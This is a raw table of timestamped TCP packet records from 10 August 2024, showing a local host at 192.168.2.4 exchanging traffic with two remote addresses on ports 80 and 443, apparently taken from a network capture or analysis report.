Aug 10, 2024 16:12:23.822058916 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.822063923 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.822123051 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.824954987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.824965000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.824975014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.825006962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.825022936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.825037956 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.825050116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.825062037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.825078964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.826642036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.826653004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.826725006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.826725006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.848769903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848781109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848793983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848839998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848850965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848856926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.848856926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.848865032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848896027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848908901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848911047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.848911047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.848946095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848958015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.848978043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.848978043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849051952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849061966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849069118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849076033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849098921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849124908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849131107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849136114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849145889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849205017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849262953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849272966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849282026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849293947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849303961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849339962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849339962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849339962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849412918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849422932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849431992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849442005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849452972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849462986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849483013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849493980 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849570036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849581957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849641085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849651098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849661112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849684000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849684000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849772930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849806070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849819899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849832058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849850893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849869967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849879980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849884033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849899054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849910021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849919081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849930048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849936962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849936962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849936962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849941015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849951982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.849973917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.849987030 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850136995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850151062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850161076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850178003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850187063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850195885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850212097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850212097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850230932 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850338936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850348949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850358963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850370884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850382090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850394011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850415945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850426912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850467920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850467920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850467920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850467920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850507021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850521088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850606918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850617886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850626945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850639105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850649118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850672960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850672960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850672960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850735903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850753069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850763083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850771904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850781918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850790977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850802898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.850852966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850852966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850852966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.850852966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851001024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851011038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851022005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851035118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851044893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851078033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851083994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851097107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851200104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851200104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851200104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851229906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851243019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851255894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851267099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851275921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851275921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851291895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851295948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851303101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851311922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851363897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851515055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851525068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851535082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851547003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851557970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851568937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851571083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851579905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851588964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851598978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851608992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851619005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851639032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851639032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851639032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851655006 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851677895 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851789951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851802111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851810932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851820946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851831913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851844072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851855993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851876974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851876974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851922035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.851954937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851975918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.851989985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852020025 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.852039099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852049112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852051973 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.852060080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852073908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852085114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852087975 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.852094889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852104902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.852114916 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.852189064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.852189064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.857831955 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.857847929 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.857928991 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.857928991 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.857933998 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.857975960 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.857989073 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.857996941 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.858016968 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.858052969 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.858536959 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.858551025 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.858620882 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.858625889 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.858952045 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.858978033 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.858989954 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.859041929 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.859046936 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.859185934 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.859514952 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.859529018 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.859575987 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.859587908 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.859699965 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.861121893 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.861135960 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.861195087 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.861198902 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.861351967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861363888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861376047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861392021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861397982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861398935 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.861398935 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.861404896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861418009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861428022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861433983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861444950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861452103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861464977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861470938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861479998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861486912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861494064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861511946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861780882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861793995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861804962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861818075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861836910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861845016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861855030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861860991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861870050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861881018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861888885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861898899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861907959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861917973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861923933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861932039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861941099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861949921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861954927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861967087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.861972094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.861989975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862209082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862226009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862236023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862246990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862257957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862272024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862282038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862287998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862297058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862303019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862313032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862318993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862332106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862337112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862344980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862351894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862368107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862376928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862557888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862569094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862580061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862582922 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.862588882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862603903 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.862606049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862634897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862648010 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.862651110 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.862797022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862807989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862812996 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.862812996 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.862816095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862827063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862838030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862853050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.862859011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862881899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.862890005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863152027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863162994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863172054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863182068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863197088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863203049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863214970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863223076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863234043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863239050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863256931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863265991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863272905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863281012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863291979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863301992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863312006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863323927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863342047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863352060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863373995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863384962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863394976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863409042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863414049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863420010 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863428116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863442898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863449097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863457918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863467932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.863475084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.863490105 CEST	80	49739	147.45.44.104	192.168.2.4
